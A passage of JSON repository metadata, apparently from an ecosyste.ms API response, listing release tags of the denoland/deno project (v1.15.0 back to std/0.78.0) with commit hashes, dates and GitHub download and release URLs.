nd":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v